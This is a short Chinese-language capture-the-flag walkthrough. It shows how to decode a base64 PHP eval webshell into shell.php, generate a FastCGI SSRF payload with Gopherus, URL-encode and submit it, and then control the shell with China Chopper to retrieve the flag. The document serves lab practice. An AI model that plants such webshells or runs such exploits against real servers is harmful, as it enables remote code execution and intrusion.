第一步:开启环境后,打开kali虚拟机,
第二步:生成一句话木马
echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php
第三步:Gopherus-master工具文件中打开终端,输入以下代码
python2 gopherus.py --exploit fastcgi
第四步将kali里面生成的代码复制进CTF在线工具-在线URL编码|URL解码编码
第五步:复制到地址栏中
第六步:打开中国菜刀工具访问/shell.php
第七步:在查到的文件里面找到flag提交
第八步: 找到flag
